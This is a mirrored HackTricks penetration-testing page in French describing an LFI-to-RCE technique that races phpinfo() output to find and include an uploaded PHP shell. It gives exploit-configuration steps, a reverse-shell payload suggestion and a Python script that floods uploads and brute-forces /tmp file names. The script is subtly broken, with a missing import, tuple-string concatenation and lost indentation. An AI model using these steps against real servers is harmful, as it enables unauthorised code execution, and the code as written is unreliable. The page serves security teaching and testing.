Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md

6.5 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Pour exploiter cette vulnérabilité, vous avez besoin : d'une vulnérabilité LFI, d'une page où phpinfo() est affiché, "file_uploads = on" et le serveur doit pouvoir écrire dans le répertoire "/tmp".

https://www.insomniasec.com/downloads/publications/phpinfolfi.py

Tutoriel HTB : https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s

Vous devez corriger l'exploit (changer => pour =>). Pour ce faire, vous pouvez :

sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py

Vous devez également modifier le payload au début de l'exploit (pour un php-rev-shell par exemple), le REQ1 (cela devrait pointer vers la page phpinfo et inclure le padding, par exemple : REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1), et LFIREQ (cela devrait pointer vers la vulnérabilité LFI, par exemple : LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r -- Vérifiez le double "%" lors de l'exploitation du caractère nul)

{% file src="../../.gitbook/assets/LFI-With-PHPInfo-Assistance.pdf" %}

Théorie

Si les téléchargements sont autorisés en PHP et que vous essayez de télécharger un fichier, ce fichier est stocké dans un répertoire temporaire jusqu'à ce que le serveur ait terminé de traiter la demande, puis ce fichier temporaire est supprimé.

Alors, si vous avez trouvé une vulnérabilité LFI dans le serveur web, vous pouvez essayer de deviner le nom du fichier temporaire créé et exploiter un RCE en accédant au fichier temporaire avant qu'il ne soit supprimé.

Sous Windows, les fichiers sont généralement stockés dans C:\Windows\temp\php<<

Sous linux, le nom du fichier est généralement aléatoire et situé dans /tmp. Comme le nom est aléatoire, il est nécessaire d'extraire de quelque part le nom du fichier temporaire et d'y accéder avant qu'il ne soit supprimé. Cela peut être fait en lisant la valeur de la variable $_FILES à l'intérieur du contenu de la fonction "phpconfig()".

phpinfo()

PHP utilise un tampon de 4096B et lorsqu'il est plein, il est envoyé au client. Ensuite, le client peut envoyer beaucoup de grosses requêtes (en utilisant de grands en-têtes) en téléchargeant un php reverse shell, attendre que la première partie du phpinfo() soit retournée (où le nom du fichier temporaire est) et essayer d'accéder au fichier temporaire avant que le serveur php ne supprime le fichier en exploitant une vulnérabilité LFI.

Script Python pour essayer de forcer le nom (si la longueur = 6)

import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:  # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥